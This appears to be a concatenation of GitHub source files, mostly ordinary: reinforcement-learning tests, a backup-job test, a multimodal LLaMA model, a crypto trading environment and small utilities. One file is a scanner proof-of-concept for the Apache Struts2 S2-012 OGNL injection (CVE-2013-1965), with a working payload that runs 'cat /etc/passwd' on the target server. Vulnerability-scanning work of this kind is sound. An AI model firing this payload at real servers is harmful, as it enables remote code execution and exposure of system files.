MazeEnvMonitoringWrapper.wrap(env, observation_logging=False, action_logging=True, reward_logging=False)\n env = LogStatsWrapper.wrap(env) # for accessing events from previous steps\n env.reset()\n\n # test application of wrapper\n for ii in range(2):\n env.step(env.action_space.sample())\n\n action_events = env.get_last_step_events(query=[ActionEvents.discrete_action,\n ActionEvents.continuous_action,\n ActionEvents.multi_binary_action])\n\n assert len(action_events) == 7\n for event in action_events:\n if event.attributes['name'] in ['action_0_0', 'action_0_1_0', 'action_0_1_1', 'action_1_0']:\n assert event.interface_method == ActionEvents.discrete_action\n elif event.attributes['name'] in ['action_0_2', 'action_2_0']:\n assert event.interface_method == ActionEvents.continuous_action\n elif event.attributes['name'] in ['action_1_1']:\n assert event.interface_method == ActionEvents.multi_binary_action\n else:\n raise ValueError\n\n","repo_name":"enlite-ai/maze","sub_path":"maze/test/core/wrappers/test_monitoring_wrapper.py","file_name":"test_monitoring_wrapper.py","file_ext":"py","file_size_in_byte":4845,"program_lang":"python","lang":"en","doc_type":"code","stars":250,"dataset":"github-code","pt":"92"} +{"seq_id":"38593459455","text":"'''Test for rsync module'''\n\nimport pytest\nfrom unittest.mock import create_autospec\nfrom unittest.mock import call, patch\nfrom pathlib import Path\n\nfrom hazelsync.job.pgsql import PgsqlJob\nfrom hazelsync.backend.dummy import DummyBackend\nfrom hazelsync.utils.rsync import DEFAULT_PATH\n\n@pytest.fixture(scope='function')\ndef backend(tmp_path):\n return DummyBackend(tmp_path)\n\n@pytest.fixture(scope='function')\ndef private_key(tmp_path):\n key = tmp_path / 'backup.key'\n key.write_text('')\n return key\n\nclass TestRsync:\n def test_create(self, private_key, backend):\n job = PgsqlJob(name='myhosts', hosts=['host01'], datadir='/data/pgsql', waldir='/data/wal', private_key=private_key, backend=backend)\n assert isinstance(job, PgsqlJob)\n\n @patch('hazelsync.job.rsync.PATH', DEFAULT_PATH)\n def test_backup(self, private_key, backend):\n job = PgsqlJob(name='myhosts', hosts=['master01'], datadir='/data/pgsql', waldir='/data/wal', private_key=private_key, backend=backend)\n with patch('hazelsync.job.rsync.rsync_run') as rsync, \\\n patch('subprocess.run') as subprocess:\n job.backup()\n options = ['-a', '-R', '-A', '--numeric-ids']\n args = {'source': Path('/data/pgsql'), 'options': options, 'includes': None, 'excludes': [Path('/data/wal')], 'private_key': private_key, 'user': 'root'}\n rsync.assert_called_with(source_host='master01', destination=backend.tmp_dir/'master01', **args)\n backup_pre_script = '''psql -c \"SELECT pg_start_backup('hazelsync', true);\"'''\n backup_post_script = '''psql -c \"SELECT pg_stop_backup();\"'''\n print(subprocess.mock_calls)\n calls = [\n call(['ssh', '-l', 'root', '-i', str(private_key), 'master01', backup_pre_script], check=True, shell=False, stderr=-1, stdout=-1, timeout=120, env=dict(PATH=DEFAULT_PATH)),\n call(['ssh', '-l', 'root', '-i', str(private_key), 'master01', backup_post_script], check=True, shell=False, stderr=-1, stdout=-1, timeout=120, env=dict(PATH=DEFAULT_PATH)),\n ]\n assert subprocess.mock_calls == calls\n subprocess.assert_has_calls(calls)\n\n def test_stream(self, private_key, backend):\n job = PgsqlJob(name='myhosts', hosts=['master01'], datadir='/data/pgsql', waldir='/data/wal', private_key=private_key, backend=backend)\n with patch('hazelsync.job.pgsql.rsync_run') as rsync:\n job.stream()\n options = ['-a', '-R', '-A', '--numeric-ids', '--remove-source-files']\n args = {'source': Path('/data/wal'), 'options': options, 'private_key': private_key, 'user': 'root'}\n rsync.assert_called_with(source_host='master01', destination=backend.tmp_dir/'master01', **args)\n","repo_name":"Japannext/hazelsync","sub_path":"tests/job/test_pgsql.py","file_name":"test_pgsql.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"40932745321","text":"from cnn_split_cifar import train\n\nif __name__ == \"__main__\":\n LRs = [1e-5, 1e-4, 1e-3]\n BSs = [32, 64, 128]\n decays = [0, 1e-5, 1e-4]\n seeds = [42]\n \n for lr in LRs:\n for bs in BSs:\n for w_d in decays:\n for seed in seeds:\n conf = {\"seed\": seed, \"train_bs\": bs, \n \"lr\": lr, \"w_decay\": w_d}\n running_acc, single_acc = train(**conf)\n print(f\"seed: {seed}\")\n print(f\"lr: {lr}\")\n print(f\"batch size: {bs}\")\n print(f\"weight decay: {w_d}\")\n print(f\"running avg test acc: {running_acc}\") \n print(f\"each task's individual acc: {single_acc}\")\n","repo_name":"bainro/active_dendrites","sub_path":"grid_search_cnn.py","file_name":"grid_search_cnn.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"92"} +{"seq_id":"71451426540","text":"monthconversion={\n 1:\"January\",\n 2:\"February\",\n 3:\"March\",\n 4:\"April\",\n \"Jun\":\"June\",\n}\nvalue=monthconversion[1]\nvalue=monthconversion.get(2)\nvalue=monthconversion.get(5)\nprint(monthconversion.get(5,\"Invalid choice\"))\nprint(monthconversion.get(5),\"Invalid choice\")\nmonthconversion[5]=\"May\"\nthisdict = dict(name = \"John\", age = 36, country = \"Norway\") #to convert to or create a dictionary\nx=monthconversion.keys() #returns list of all the keys gets updated everytime you add new value to dict\ny=monthconversion.values() #returns list of all the values gets updated everytime you add new value to dict\nz=monthconversion.items() #Get a list of the key:value pairs as tuples\nmonthconversion.update({4:\"July\"}) #to update a value also use to add new item\n\n# pop() to delete a item clear() to delete whole dictionary\n#.pop() is used to delete the key,value pair and store value in another variable\ndel monthconversion[\"Jun\"] \nmonth=dict(monthconversion) #.copy() is also used to copy a dictionary\n\n#Access items in list\nfor key,value in month.items():\n print(key,value)\n\n","repo_name":"SuyashAgarwal14/Python-basics","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18059185666","text":"# -*- coding: utf-8 -*-\nimport logging\nimport logging.config\n\nfrom amplify.agent.common.context import context\n\ntry:\n import thread\nexcept ImportError:\n # Renamed in Python 3\n import _thread as thread\n\n\n__author__ = \"Mike Belov\"\n__copyright__ = \"Copyright (C) Nginx, Inc. All rights reserved.\"\n__license__ = \"\"\n__maintainer__ = \"Mike Belov\"\n__email__ = \"dedm@nginx.com\"\n\nLOGGERS_CACHE = {}\n\n\nclass NAASLogRecord(logging.LogRecord):\n def __init__(self, *args, **kwargs):\n logging.LogRecord.__init__(self, *args, **kwargs)\n thread_id = thread.get_ident()\n self.action_id = context.action_ids.get(thread_id, 0)\n\n\nclass NAASLogger(logging.getLoggerClass()):\n @staticmethod\n def makeRecord(name, level, fn, lno, msg, args, exc_info, func=None, extra=None, sinfo=None):\n return NAASLogRecord(name, level, fn, lno, msg, args, exc_info, func)\n\n\nlogging.setLoggerClass(NAASLogger)\n\n\ndef setup(logger_file):\n logging.config.fileConfig(logger_file)\n\n\ndef get(log_name):\n \"\"\"\n Creates logger object to specified log and caches it in LOGGERS_CACHE dict\n\n :param log_name: log name\n :return: logger object\n \"\"\"\n if log_name not in LOGGERS_CACHE:\n logger = logging.getLogger(log_name)\n LOGGERS_CACHE[log_name] = logger\n return LOGGERS_CACHE[log_name]\n\n\ndef get_debug_handler(log_file):\n \"\"\"\n returns a file handler for debug log file\n :param log_file: str log file\n :return: FileHandler obj\n \"\"\"\n handler = logging.FileHandler(log_file, 'a')\n formatter = logging.Formatter('%(asctime)s [%(process)d] %(action_id)s %(threadName)s %(message)s')\n handler.setFormatter(formatter)\n return handler\n","repo_name":"nginxinc/nginx-amplify-agent","sub_path":"amplify/agent/common/util/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"92"} +{"seq_id":"26376926674","text":"#By default id is not showed\n\nfrom citoplasma.pages import Pages\nfrom citoplasma.urls import add_get_parameters\nfrom citoplasma.sessions import get_session\nfrom citoplasma.i18n import I18n\nfrom bottle import request\nimport sys\n\nclass SimpleList:\n \n def __init__(self, model, url, t):\n \n self.t=t\n \n self.model=model\n \n if len(self.model.forms)==0:\n \n self.model.create_forms()\n \n self.fields=model.fields.keys()\n \n self.fields_showed=self.fields\n \n self.url=url\n \n self.limit_pages=20\n \n self.order_defaults=['ASC', 'DESC']\n \n self.order_class=['up', 'down']\n \n self.s=get_session()\n \n #self.s['order']=self.s.get('order', 0)\n \n self.order_by=self.order_defaults[0]\n \n self.change_order={}\n \n self.yes_search=True\n \n self.search_text=''\n \n self.initial_num_pages=20\n \n request.query.get('begin_page', '0')\n \n try: \n \n self.begin_page=int(request.query.begin_page)\n \n except ValueError:\n self.begin_page=0\n \n if self.begin_page<0:\n self.begin_page=0\n \n self.search_fields=self.fields\n \n #self.yes_options=True\n \n self.arr_extra_fields=[I18n.lang('common', 'options', 'Options')]\n \n self.arr_extra_options=[SimpleList.standard_options]\n \n self.jln='<br />'\n\n def restore_fields(self):\n self.fields=self.model.fields.keys()\n \n def obtain_order(self):\n \n self.s['order']=self.s.get('order', 0)\n \n order_k=self.s['order']\n \n #Obtain from get\n \n if 'order' in request.query.keys():\n \n order_k=int(request.query.get('order', 0))\n \n if order_k>1 or order_k<0:\n order_k=0\n \n self.order_by=self.order_defaults[ order_k ]\n \n self.s['order']=order_k\n \n self.s.save()\n \n def obtain_field_search(self):\n \n self.s['order_field']=self.s.get('order_field', self.model.name_field_id)\n \n field_k=self.s['order_field']\n \n if 'order_field' in request.query.keys():\n field_k=request.query.order_field\n \n if field_k in self.model.fields.keys():\n \n self.s['order_field']=field_k\n \n for field in self.fields:\n self.change_order[field]=self.s['order']\n \n if self.s['order']==0:\n self.change_order[field_k]=1\n else:\n self.change_order[field_k]=0\n \n self.s.save()\n \n self.order_field=self.s['order_field']\n \n def search(self):\n \n request.query.get('search_text', '')\n \n self.search_text=request.query.search_text\n \n self.search_text=self.search_text.replace('\"', '"')\n \n #self.model.conditions='AND \n \n self.search_field=request.query.get('search_field', '')\n \n if self.search_field not in self.model.fields.keys():\n self.search_field=''\n \n if self.search_field!='' and self.search_text!='':\n self.model.conditions[0]+=' AND '+self.search_field+' LIKE %s'\n self.model.conditions[1]=['%'+self.search_text+'%']\n \n pass\n \n def set_options(self, options_func, arr_row):\n #SimpleList.standard_options(arr_row)\n return self.jln.join(options_func(self.url, arr_row[self.model.name_field_id], arr_row)) \n \n @staticmethod\n def standard_options(url, id, arr_row):\n options=[]\n options.append('<a href=\"'+add_get_parameters(url, op_admin=1, id=id)+'\">'+I18n.lang('common', 'edit', 'Edit')+'</a>')\n options.append('<a href=\"'+add_get_parameters(url, op_admin=3, id=id)+'\">'+I18n.lang('common', 'delete', 'Delete')+'</a>')\n return options\n \n def show(self):\n \n self.obtain_order()\n \n self.obtain_field_search()\n \n self.search()\n \n total_elements=self.model.select_count()\n \n num_elements=self.limit_pages\n \n link=add_get_parameters(self.url, search_text=self.search_text, search_field=self.search_field)\n \n begin_page=self.begin_page\n \n self.model.order_by='order by '+self.order_field+' '+self.order_by\n \n self.model.limit='limit '+str(begin_page)+','+str(self.limit_pages)\n \n list_items=self.model.select(self.fields)\n \n pages=Pages.show( begin_page, total_elements, num_elements, link ,initial_num_pages=self.initial_num_pages, variable='begin_page', label='', func_jscript='')\n \n self.begin_page=str(self.begin_page)\n \n return self.t.load_template('utils/list.phtml', simplelist=self, list=list_items, pages=pages)\n \n","repo_name":"webtsys/paramecio","sub_path":"citoplasma/lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":5062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"28263501606","text":"# coding: utf-8\n\nfrom CScanPoc.thirdparty import requests\nfrom CScanPoc import ABPoc, ABVuln, VulnLevel, VulnType\n\n\nclass Vuln(ABVuln):\n vuln_id = 'Apache_Struts_0007_p' # 平台漏洞编号,留空\n name = 'Apache Struts2 S2-012远程代码执行' # 漏洞名称\n level = VulnLevel.HIGH # 漏洞危害级别\n type = VulnType.RCE # 漏洞类型\n disclosure_date = '2013-05-23' # 漏洞公布时间\n desc = '''S\n Apache Struts2中存在漏洞,该漏洞源\n\n OGNL提供,除其他功能,广泛表达评价的能力。\n\n 一个请求,包括特制的请求参数可以用来为物业注入任意ognl代码,后来作为一个重定向地址请求参数,这将导致进一步的评估。 \n ''' # 漏洞描述\n ref = 'https://cwiki.apache.org/confluence/display/WW/S2-012' # 漏洞来源\n cnvd_id = 'Unknown' # cnvd漏洞编号\n cve_id = 'CVE-2013-1965' # cve编号\n product = 'Apache-Struts' # 漏洞应用名称\n product_version = 'Apache Struts2.0.0 - 2.3.13' # 漏洞应用版本\n\n\nclass Poc(ABPoc):\n poc_id = '99c959f7-41b8-4747-bf28-500847b43485'\n author = 'cscan' # POC编写者\n create_date = '2018-04-17' # POC创建时间\n\n def __init__(self):\n super(Poc, self).__init__(Vuln())\n self.option_schema = {\n 'properties': {\n 'base_path': {\n 'type': 'string',\n 'description': '部署路径',\n 'default': '',\n '$default_ref': {\n 'property': 'deploy_path'\n }\n }\n }\n }\n\n def verify(self):\n self.target = self.target.rstrip(\n '/') + '/' + (self.get_option('base_path').lstrip('/'))\n try:\n\n self.output.info('开始对 {target} 进行 {vuln} 的扫描'.format(\n target=self.target, vuln=self.vuln))\n payload = {'name': '%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\"cat\",\"/etc/passwd\"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}'}\n request = requests.get(\n '{target}/user.action'.format(target=self.target), params=payload)\n r = request.text\n if 'root:x:0:0:root:/root:/bin/bash' in r:\n self.output.report(self.vuln, '发现{target}存在{name}漏洞'.format(\n target=self.target, name=self.vuln.name))\n\n except Exception as e:\n self.output.info('执行异常{}'.format(e))\n\n def exploit(self):\n self.verify()\n\n\nif __name__ == '__main__':\n Poc().run()\n","repo_name":"qsdj/cncs-armory-ktrimisu","sub_path":"pocs/middleware/Apache-Struts/Apache_Struts_0007_p.py","file_name":"Apache_Struts_0007_p.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"92"} +{"seq_id":"42990054631","text":"from itertools import count\nfrom typing import List, Optional, Tuple, Union\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn import CrossEntropyLoss\nfrom transformers import (\n BatchEncoding,\n CLIPModel,\n CLIPProcessor,\n LlamaConfig,\n LlamaForCausalLM,\n LlamaModel,\n)\nfrom transformers.modeling_outputs import (\n BaseModelOutputWithPast,\n CausalLMOutputWithPast,\n)\n\n\nclass ClimaConfig(LlamaConfig):\n model_type = \"clima\"\n\n\nclass ClimaModel(LlamaModel):\n config_class = ClimaConfig\n\n def __init__(self, config: LlamaConfig):\n super(ClimaModel, self).__init__(config)\n\n if hasattr(config, \"mm_vision_tower\"):\n # HACK: wrap in list to not make vision model count as a parameter\n self.vision_tower = [CLIPModel.from_pretrained(config.mm_vision_tower)]\n\n if hasattr(config, \"use_mm_proj\"):\n self.mm_projector = nn.Linear(config.mm_hidden_size, config.hidden_size)\n\n def initialize_vision_modules(self, vision_tower, mask_token_id, pretrain_mm_mlp_adapter=None, **kwargs):\n self.config.mm_vision_tower = vision_tower\n\n processor = CLIPProcessor.from_pretrained(vision_tower)\n\n if not hasattr(self, 'vision_tower'):\n # hack to make clip model work with device_map=\"auto\"\n CLIPModel._no_split_modules = CLIPModel._no_split_modules or ['CLIPTextTransformer', 'CLIPVisionTransformer']\n vision_tower = CLIPModel.from_pretrained(vision_tower, torch_dtype=self.dtype, **kwargs)\n else:\n vision_tower = self.vision_tower[0]\n vision_tower.requires_grad_(False)\n self.vision_tower = [vision_tower]\n\n vision_config = vision_tower.config\n\n self.config.use_mm_proj = True\n self.config.mm_hidden_size = vision_config.projection_dim\n vision_config.im_patch_token = mask_token_id\n vision_config.num_patches = 1 # since we use the pooled, projected output\n\n if not hasattr(self, 'mm_projector'):\n self.mm_projector = nn.Linear(vision_config.projection_dim, self.config.hidden_size, dtype=self.dtype, device=self.device)\n\n if pretrain_mm_mlp_adapter is not None:\n mm_projector_weights = torch.load(pretrain_mm_mlp_adapter, map_location=self.device)\n self.mm_projector.load_state_dict({k.split('.')[-1]: v for k, v in mm_projector_weights.items()})\n\n return dict(\n processor=processor,\n vision_config=vision_config\n )\n\n # https://stackoverflow.com/a/57208704\n def _apply(self, fn):\n super()._apply(fn)\n if hasattr(self, \"vision_tower\"):\n self.vision_tower = [vis._apply(fn) for vis in self.vision_tower]\n return self\n\n def get_vision_features(self, text_or_image, *args, **kwargs):\n if isinstance(text_or_image, (BatchEncoding, dict)):\n if \"pixel_values\" in text_or_image:\n embeds = self.vision_tower[0].get_image_features(*args, **text_or_image, **kwargs)\n else:\n embeds = self.vision_tower[0].get_text_features(*args, **text_or_image, **kwargs)\n else:\n if text_or_image.dim() == 4:\n embeds = self.vision_tower[0].get_image_features(text_or_image, *args, **kwargs)\n else:\n embeds = self.vision_tower[0].get_text_features(text_or_image, *args, **kwargs)\n\n return embeds.unsqueeze(1)\n\n def is_tensor(self, thing):\n if isinstance(thing, (BatchEncoding, dict)):\n return all(isinstance(v, torch.Tensor) for v in thing.values())\n return isinstance(thing, torch.Tensor)\n\n def forward(\n self,\n input_ids: torch.LongTensor = None,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_values: Optional[List[torch.FloatTensor]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n images: Optional[Union[BatchEncoding, torch.FloatTensor]] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple, BaseModelOutputWithPast]:\n\n if inputs_embeds is None:\n inputs_embeds = self.embed_tokens(input_ids)\n\n vision_tower = getattr(self, 'vision_tower', None)\n if vision_tower is not None and (input_ids.shape[1] != 1 or self.training) and images is not None:\n vision_tower = vision_tower[0]\n with torch.no_grad():\n if self.is_tensor(images):\n image_features = self.get_vision_features(images)\n # variable length images or texts / multimodal inputs with both image and texts\n elif isinstance(images, (BatchEncoding, dict)): # BatchEncoding of lists of tensor\n image_features = []\n try:\n for idx in count():\n image_feature = self.get_vision_features({k: v[idx].unsqueeze(0) for k, v in images.items()})\n image_features.append(image_feature)\n except IndexError:\n pass\n elif isinstance(images[0], (BatchEncoding, dict)): # list of BatchEncoding of tensor\n image_features = []\n for image in images:\n image_feature = self.get_vision_features({k: v.unsqueeze(0) for k, v in image.items()})\n image_features.append(image_feature)\n else: # same, but only the list\n for image in images:\n image_feature = self.get_vision_features(image.unsqueeze(0))\n image_features.append(image_feature)\n if self.is_tensor(images):\n image_features = self.mm_projector(image_features)\n else:\n image_features = [self.mm_projector(image_feature)[0] for image_feature in image_features]\n dummy_image_features = torch.zeros(len(image_features[0]), self.config.mm_hidden_size, device=inputs_embeds.device, dtype=inputs_embeds.dtype)\n dummy_image_features = self.mm_projector(dummy_image_features)\n\n new_input_embeds = []\n cur_image_idx = 0\n for cur_input_ids, cur_input_embeds in zip(input_ids, inputs_embeds):\n if (cur_input_ids == vision_tower.config.im_patch_token).sum() == 0:\n # multimodal LLM, but the current sample is not multimodal\n cur_input_embeds = cur_input_embeds + (0. * dummy_image_features).sum()\n new_input_embeds.append(cur_input_embeds)\n cur_image_idx += 1\n continue\n\n cur_image_features = image_features[cur_image_idx]\n num_patches = cur_image_features.shape[0]\n if (cur_input_ids == vision_tower.config.im_patch_token).sum() != num_patches:\n raise ValueError(\"The number of image patch tokens should be the same as the number of image patches.\")\n masked_indices = torch.where(cur_input_ids == vision_tower.config.im_patch_token)[0]\n mask_index_start = masked_indices[0]\n if (masked_indices != torch.arange(mask_index_start, mask_index_start+num_patches, device=masked_indices.device, dtype=masked_indices.dtype)).any():\n raise ValueError(\"The image patch tokens should be consecutive.\")\n cur_new_input_embeds = torch.cat((cur_input_embeds[:mask_index_start], cur_image_features, cur_input_embeds[mask_index_start+num_patches:]), dim=0)\n new_input_embeds.append(cur_new_input_embeds)\n cur_image_idx += 1\n\n inputs_embeds = torch.stack(new_input_embeds, dim=0)\n\n return super(ClimaModel, self).forward(\n input_ids=None, attention_mask=attention_mask, past_key_values=past_key_values,\n inputs_embeds=inputs_embeds, use_cache=use_cache,\n output_attentions=output_attentions, output_hidden_states=output_hidden_states,\n return_dict=return_dict\n )\n\n\nclass ClimaForCausalLM(LlamaForCausalLM):\n config_class = ClimaConfig\n\n def __init__(self, config):\n super(LlamaForCausalLM, self).__init__(config)\n self.model = ClimaModel(config)\n\n self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False)\n\n # Initialize weights and apply final processing\n self.post_init()\n\n def get_model(self):\n return self.model\n\n def forward(\n self,\n input_ids: torch.LongTensor = None,\n attention_mask: Optional[torch.Tensor] = None,\n past_key_values: Optional[List[torch.FloatTensor]] = None,\n inputs_embeds: Optional[torch.FloatTensor] = None,\n labels: Optional[torch.LongTensor] = None,\n use_cache: Optional[bool] = None,\n output_attentions: Optional[bool] = None,\n output_hidden_states: Optional[bool] = None,\n images: Optional[Union[BatchEncoding, torch.FloatTensor]] = None,\n return_dict: Optional[bool] = None,\n ) -> Union[Tuple, CausalLMOutputWithPast]:\n output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions\n output_hidden_states = (\n output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states\n )\n return_dict = return_dict if return_dict is not None else self.config.use_return_dict\n\n # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn)\n outputs = self.model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n past_key_values=past_key_values,\n inputs_embeds=inputs_embeds,\n use_cache=use_cache,\n output_attentions=output_attentions,\n output_hidden_states=output_hidden_states,\n return_dict=return_dict,\n images=images\n )\n\n hidden_states = outputs[0]\n logits = self.lm_head(hidden_states)\n\n loss = None\n if labels is not None:\n # Shift so that tokens < n predict n\n shift_logits = logits[..., :-1, :].contiguous()\n shift_labels = labels[..., 1:].contiguous()\n # Flatten the tokens\n loss_fct = CrossEntropyLoss()\n shift_logits = shift_logits.view(-1, self.config.vocab_size)\n shift_labels = shift_labels.view(-1)\n # Enable model/pipeline parallelism\n shift_labels = shift_labels.to(shift_logits.device)\n loss = loss_fct(shift_logits, shift_labels)\n\n if not return_dict:\n output = (logits,) + outputs[1:]\n return (loss,) + output if loss is not None else output\n\n return CausalLMOutputWithPast(\n loss=loss,\n logits=logits,\n past_key_values=outputs.past_key_values,\n hidden_states=outputs.hidden_states,\n attentions=outputs.attentions,\n )\n\n def prepare_inputs_for_generation(\n self, input_ids, past_key_values=None, attention_mask=None, inputs_embeds=None, **kwargs\n ):\n if past_key_values:\n input_ids = input_ids[:, -1:]\n\n # if `inputs_embeds` are passed, we only want to use them in the 1st generation step\n if inputs_embeds is not None and past_key_values is None:\n model_inputs = {\"inputs_embeds\": inputs_embeds}\n else:\n model_inputs = {\"input_ids\": input_ids}\n\n model_inputs.update(\n {\n \"past_key_values\": past_key_values,\n \"use_cache\": kwargs.get(\"use_cache\"),\n \"attention_mask\": attention_mask,\n \"images\": kwargs.get(\"images\", None),\n }\n )\n return model_inputs\n","repo_name":"potamides/AutomaTikZ","sub_path":"automatikz/model/clima/modeling_clima.py","file_name":"modeling_clima.py","file_ext":"py","file_size_in_byte":11954,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"92"} +{"seq_id":"32184273527","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\nfrom gym import spaces\nimport matplotlib.pyplot as plt\n\n\nclass cryptoEnv(object):\n r\"\"\"A trading currency env that works in similar fashion to OpenAI gym\n Sends a state at time (t) at every step (minute/hour/day/week)\n ---> CSV must be set in latest-oldest prices\n Args:\n dataset: CSV dataset with OHLC (Open, High, Low, Close) prices\n available_cash: Amount of money that can be used to trade\n purchase_size: Percentage of the crypto currency that can be purchased\n --> [0,1] range \n n_actions: Number of availabe actions\n --> I.E. if n_actions = 10:\n [0-9] sell ,[10] hold,[11-20] buy actions, == 20 total actions\n loss_limit: Stops when wallets losses X amount of money \n --> Start with $1000, stop when there is less than $700 total\n set loss_limit to 0.7\n n_actions: Sets the number of buy and sell actions\n loss_limit: Sets done flag when agent loses X amount of money.\n min_max: Sets preprocessing to between [0,1] else it will use standard scaler\n SEED: numpy random seed\n Shape (State):\n Prices are scaled.\n [Open, High, Low, Close, Cypto Wallet, USD_Wallet]\n Examples:\n -- s = env.reset()\n -- done = False\n -- while not done:\n -- action = agent.pick_action(s)\n -- s' , reward, done, info = env.step(action)\n -- s= s'\n \"\"\"\n def __init__(self,\n dataset,\n available_cash,\n purchase_size=1,\n n_actions=10,\n loss_limit=0.7,\n min_max=True,\n SEED=1337):\n np.random.seed(SEED)\n self.loss_limit = loss_limit\n if min_max:\n self.scaler = MinMaxScaler()\n else:\n self.scaler = StandardScaler()\n self.dataset = dataset\n self.price: float = None\n self.purchase_size = purchase_size\n self.available_cash = available_cash\n self.usd_wallet: float = None\n self.crypto_wallet: float = None\n self.reward_dec: float = 1.0\n self.time_step: int = 0\n self.OHLC_shape = None\n self.scaled_stock_prices = None\n self.n_steps = None\n self.action_set = np.arange(-n_actions, n_actions)\n self.action_space = spaces.Discrete(len(self.action_set))\n self.obs_space = None\n self.portfolio, self.price_history = [], []\n self.scaled_prices = None\n self.OHLC_unscaled = self._load()\n self.episode = 0\n\n def _load(self):\n df = pd.read_csv(self.dataset)\n df = df.iloc[::-1]\n df = df.dropna()\n OHLC_prices = df.values\n self.scaled_prices = self.scaler.fit_transform(df)\n self.n_steps, self.OHLC_shape = OHLC_prices.shape\n # OHLC + Crypto Wallet + USD Wallet\n self.obs_space = np.empty(self.OHLC_shape + 2, dtype=np.float)\n return OHLC_prices\n\n def save_records(self):\n if not os.path.exists('history'):\n os.mkdir('history')\n plt.title(\"Price History\")\n plt.xlabel(\"Time Steps\")\n plt.ylabel(\"Price $(USD)\")\n plt.plot(self.portfolio, label='Portfolio Total Balance')\n plt.plot(self.price_history, label='price')\n plt.legend()\n plt.savefig(f'history/episode_{self.episode}')\n plt.show()\n plt.clf()\n self.episode += 1\n\n def reset(self):\n self.portfolio, self.price_history = [], []\n self.time_step = 0\n self.crypto_wallet = 0\n self.usd_wallet = self.available_cash\n self._get_price()\n self.reward_dec -= 1e-3 if self.reward_dec > 0 else 0\n return self._get_obs()\n\n def step(self, a):\n assert (0 <= a <= len(self.action_set)), \"Invalid Action\"\n self.portfolio.append(self.usd_wallet + self.crypto_wallet)\n self.price_history.append(self.price)\n reward = 0.0\n prev_holding = self._get_holdings()\n self._trade(a)\n self.time_step += 1\n self._update_wallets()\n cur_holdings = self._get_holdings()\n\n profit = cur_holdings / prev_holding\n\n if cur_holdings < self.loss_limit * self.available_cash:\n done = True\n else:\n reward += 1\n done = (self.time_step == self.n_steps - 5)\n\n INFO = {\"HOLDINGS\": cur_holdings, \"PROFIT\": profit}\n\n if profit > 1.0:\n reward += (profit * self.reward_dec) + 1\n else:\n reward += (profit * self.reward_dec) - 1\n\n obs_ = self._get_obs()\n return obs_, reward, done, INFO\n\n def _get_holdings(self):\n return self.crypto_wallet + self.usd_wallet\n\n def _get_obs(self):\n self.obs_space[:4] = self.scaled_prices[self.time_step]\n self.obs_space[4] = self.crypto_wallet\n self.obs_space[5] = self.usd_wallet\n return self.obs_space\n\n def _trade(self, a):\n a -= 10\n a *= (self.price * self.purchase_size)\n if a < 0:\n self._buy_or_sell(a, purchase=False)\n elif a > 0:\n self._buy_or_sell(a, purchase=True)\n elif a == 0:\n return\n else:\n print(\"Not a valid action\")\n return\n\n def _buy_or_sell(self, amount, purchase):\n amount = abs(amount)\n if purchase:\n if self.usd_wallet <= 0:\n return\n if self.usd_wallet >= amount:\n self.usd_wallet -= amount\n self.crypto_wallet += amount\n else:\n if self.crypto_wallet <= 0:\n return\n if self.crypto_wallet >= amount:\n self.crypto_wallet -= amount\n self.usd_wallet += amount\n\n def _get_price(self):\n self.price = self.OHLC_unscaled[self.time_step][3]\n\n def _update_wallets(self):\n self.crypto_wallet *= (self.OHLC_unscaled[self.time_step + 1][3] /\n self.price)\n","repo_name":"alantess/cryptogym","sub_path":"cryptogym/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":6117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41796558046","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0094_auto_20160318_1850'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='tagbase',\n options={'ordering': ['date_v_debut'], 'verbose_name': 'Tag r\\xe9f\\xe9rent', 'verbose_name_plural': 'Tags r\\xe9f\\xe9rents'},\n ),\n migrations.AddField(\n model_name='personnetravel',\n name='photo1',\n field=models.ForeignKey(related_name='photo1', verbose_name='Travel picture 1', blank=True, to='app.Photo', null=True),\n ),\n migrations.AddField(\n model_name='personnetravel',\n name='photo2',\n field=models.ForeignKey(related_name='photo2', verbose_name='Travel picture 2', blank=True, to='app.Photo', null=True),\n ),\n migrations.AddField(\n model_name='personnetravel',\n name='photo3',\n field=models.ForeignKey(related_name='photo3', verbose_name='Travel picture 3', blank=True, to='app.Photo', null=True),\n ),\n migrations.AlterField(\n 